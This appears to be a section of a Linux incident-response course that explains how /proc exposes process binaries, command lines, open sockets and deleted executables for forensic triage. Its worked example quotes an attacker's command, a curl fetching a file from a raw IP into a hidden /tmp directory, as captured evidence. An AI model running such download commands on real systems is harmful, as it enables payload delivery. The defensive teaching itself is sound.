In this section

The Linux /proc Filesystem as a Forensic Evidence Source

Module 0

What "everything is a file" means for evidence

Linux exposes the live, running system as files: the processes executing right now, the network connections they hold, and the actual program behind each one are all readable with ordinary file commands. This sub is about the design decision behind that, the /proc filesystem, and why it is the most trustworthy source on a compromised host.

It is the mechanism under most of the live-response work in the course. Section 0.3 told you memory and process state are collectable and fast-decaying; this sub shows you how the kernel hands them to you, and why an attacker's user-space malware cannot easily lie to it.

A design decision with forensic consequences

Linux inherits a principle from Unix that sounds like a slogan until you see what it buys an investigator: everything is a file. A document is a file, obviously. But so is a hard disk (/dev/sda), a terminal, a source of random numbers (/dev/urandom), and, most usefully for incident response, the state of every running process. The kernel maintains a special filesystem, mounted at /proc, that does not contain files on any disk. Its contents are generated on the fly by the kernel to represent the live system. When you read a file under /proc, you are reading the kernel's current answer to a question about what is running right now.

This is why Linux is so transparent to an investigator. On a system that hid its internals, you would need special tooling and privileged interfaces to learn what a process is doing. On Linux, you ask the kernel by reading a file, with the same cat, ls, and readlink commands you already know. The process that is beaconing to an attacker's server cannot hide from this, because the kernel itself is reporting on it, and the kernel is the one thing on the host the attacker's user-space malware cannot easily lie to.

It is worth pausing on why that last point holds. Malware runs in user space, the unprivileged layer where ordinary programs execute. The information under /proc is generated by the kernel, the privileged core that actually schedules processes, owns memory, and brokers every network packet. For a process to falsify what /proc reports, it would need to subvert the kernel itself, which requires a far deeper and rarer compromise than dropping a script and adding a cron job. The overwhelming majority of intrusions, the living-off-the-land pattern this course centers on, never touch the kernel at all. They run as www-data or root in user space, fully visible to a kernel that has no reason to cover for them. This is why /proc is the investigator's anchor: it is the most trustworthy narrator on a compromised host.

Reading a process from /proc

Every running process has a numeric process ID, its PID, and a corresponding directory under /proc. A process with PID 2148 has a directory at /proc/2148, and inside it the kernel exposes everything it knows about that process. Four entries do most of the investigative work.

Four files, four answers the kernel gives about any running process. None of them depends on the process describing itself honestly: the kernel reports what the process actually is, which is why these four entries are where a live investigation starts.

Take the suspicious process from Section 0.1, the curl that the web user was running. Suppose ps showed it as PID 2148. You ask the kernel what binary is actually behind it:

reading the live process

$ readlink /proc/2148/exe
/usr/bin/curl
$ cat /proc/2148/cmdline | tr '\0' ' '
curl -s http://203.0.113.40/x -o /tmp/.cache/up
$ readlink /proc/2148/cwd
/var/www/html
$ ls -l /proc/2148/fd
0 -> /dev/null   1 -> pipe:[48211]   3 -> socket:[48230]

In four reads you have established that PID 2148 is the real curl binary, fetching from a raw IP into a hidden directory, launched from the web root, with an open network socket. The kernel told you all of it, and none of it depended on trusting the process to describe itself.

Why /proc defeats common attacker tricks

Reading from /proc matters most because it sees through deception that fools the ordinary commands. An attacker can rename their malicious binary to look innocent, calling it [kworker/0:1] to mimic a kernel thread. The ps output then shows a believable name. But /proc//exe is a kernel-maintained link to the actual file on disk, and it does not care what the process called itself. readlink on it returns the true path, exposing that the supposed kernel worker is really /tmp/.x/miner.

Better still, attackers frequently delete their binary from disk after launching it, so that a later examiner finds nothing to analyze. When a running process's executable has been deleted, the kernel records this in the exe link, which now points at the original path marked (deleted). That marker is itself a strong indicator of compromise, because legitimate software does not delete its own running binary. And because the kernel still holds the file open on behalf of the running process, you can often recover the deleted executable in full by copying it straight back out of /proc//exe while the process lives. The attacker deleted the file from the filesystem, but the kernel never let go of it, and /proc is your door to it.

The name a process chooses and the binary the kernel is actually running are two separate facts. The attacker controls the first and cannot touch the second, which is why you read the second.

Principle

Trust the kernel's view over the process's self-description. Anything a process controls, its name in ps, its own log output, files it writes, it can falsify. The kernel-maintained entries under /proc describe what the process actually is and does, independent of what it claims. When the two disagree, the disagreement is evidence.

Recovering that deleted miner is two commands, and it is the difference between an incident report that says "a process was running an unknown binary" and one that hands the malware to analysis. While the process is alive, the kernel is still holding its executable open, so you copy it straight out of the exe link:

recovering a deleted running binary

$ readlink /proc/4471/exe
/tmp/.x/miner (deleted)
$ cp /proc/4471/exe /evidence/miner-4471
# the binary the attacker thought they had destroyed, now yours to hash and analyse

The recovered file is a complete, runnable copy. You hash it, submit it to analysis, and the cleanup the attacker performed to leave you nothing has left you the whole sample instead, on the one condition that you reached it before the process exited.

Anti-pattern

Triaging a suspected-compromised host with ps and netstat and trusting the output, when those are exactly the user-space tools a rootkit hooks to hide the processes and connections you are hunting. A tampered ps can simply omit the malicious PID, and you would never know it was there. Reading the kernel's own view, the numbered directories under /proc and the socket data ss pulls from it, is the harder-to-fool path: hiding from it requires subverting the kernel itself, a far rarer and deeper compromise. When the stakes are high, cross-check the friendly tool against the raw kernel source, and treat any disagreement, a PID in /proc that ps does not list, as a finding in its own right.

Network connections are files too

The same principle extends to the network. Every network connection a process holds appears in its /proc//fd directory as a socket, and the kernel exposes the full table of network connections through /proc/net as well. The friendly tools, ss and the older netstat, are reading exactly this kernel data and presenting it tied to the owning process:

ss -tnp: connections with owning process

State  Local Address       Peer Address        Process
ESTAB  10.0.4.12:54012     203.0.113.40:8080     users:(("curl",pid=2148,fd=3))

That single line ties together the whole finding: the process (curl, PID 2148), the file descriptor (fd=3, the same socket you saw in /proc/2148/fd), and the peer it is talking to (the attacker's address on port 8080). Process, connection, and destination, joined by the kernel. This is the live network state Section 0.3 told you to capture early, and now you know it is the kernel reporting on its own sockets, which is why it is reliable even on a compromised host.

More of what /proc reveals

The four entries covered so far are the ones you reach for first, but a process directory holds more, and each entry answers a specific investigative question. /proc//status gives the process state, the real and effective user IDs, and the parent process ID, which tells you who launched it. A bash process whose parent is the web server rather than a login shell is immediately suspicious, because web servers do not normally spawn interactive shells. /proc//environ holds the environment variables the process was started with, which can capture an attacker's configuration, the address of a command-and-control server passed as a variable, or credentials left in the environment. /proc//maps lists the memory regions the process has mapped, including every shared library it loaded, which is how you spot a process that has loaded something it should not have. None of these requires special tooling. Each is a file you read.

Reading these for a single known-bad PID is the easy case. The harder and more common task is finding the bad PID in the first place among the hundreds a busy server runs, and /proc supports that too. Because every process is a numbered directory, you can sweep all of them at once, asking the same question of each: which processes are running a binary that has been deleted, which are running from /tmp or /dev/shm, which were launched by a service account that should never spawn a shell. A loop over /proc/*/exe that flags every link ending in (deleted) surfaces, in one pass, exactly the processes most likely to be malicious, because as the previous section noted, legitimate software does not delete its own running binary. This systematic sweep is the difference between knowing /proc exists and being able to use it under pressure, and Module 8 builds it into a repeatable triage routine.

The foundation under the course

Almost every live-response technique in the modules ahead rests on what this section established. Memory forensics in Module 7 captures and parses the same process and connection structures, just frozen into an image instead of read live. Malware triage in Module 7 begins by recovering the running binary from /proc before the attacker's cleanup can remove it. The persistence hunt in Section 0.6 and Module 5 checks what processes legitimate services should and should not have spawned. The reason any of this is possible, the reason a standard Linux host will tell you the complete truth about itself if you know which files to read, is the design decision this section opened with. The next section turns from the live system to its recorded history: the logs, where the host writes down what happened so you can read it after the fact.

Next section

0.5: Reading the authentication and system logs

The live system tells you what is happening now. The logs tell you what happened before you arrived. Learn to read the authentication log, the systemd journal, and the audit log, with real entries and what each one reveals.

← Previous Next →

Reading width

Text size